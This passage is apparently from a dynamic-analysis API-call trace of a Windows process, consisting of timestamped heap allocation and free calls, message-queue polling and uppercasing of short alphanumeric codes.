0x24a9e88 [0265.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0265.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0265.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0265.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0265.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0265.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0265.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0265.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0265.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0265.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0265.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0265.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0265.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0265.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0265.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0265.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0265.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0265.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0265.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0265.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0265.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0265.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0265.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0265.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0265.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0265.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0265.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0265.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0265.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0265.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0265.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0265.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0265.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0265.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0265.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0265.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0265.253] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0265.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0265.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0265.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0265.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0265.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0265.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0265.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0265.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0265.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0265.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0265.254] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0265.254] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0265.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0265.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0265.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0265.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0265.255] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0265.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c78 [0265.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.255] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0265.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0265.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0265.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0265.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0265.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0265.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0265.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0265.256] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0265.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0265.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0265.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0265.256] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0265.256] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0265.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0265.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0265.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0265.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0265.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0265.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0265.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0265.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0265.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0265.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0265.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0265.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0265.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0265.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0265.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0265.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0265.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0265.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0265.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0265.258] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0265.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0265.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0265.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.258] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0265.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0265.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0265.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0265.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0265.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0265.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0265.259] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0265.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0265.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0265.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0265.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0265.259] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0265.259] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0265.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0265.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0265.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0265.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0265.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0265.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0265.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0265.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0265.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0265.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0265.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0265.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0265.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0265.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0265.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0265.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0265.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0265.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0265.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0265.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0265.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0265.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0265.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0265.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0265.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0265.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0265.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0265.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0265.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0265.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.262] RtlAllocateHeap (HeapHandle=0x25c0000, 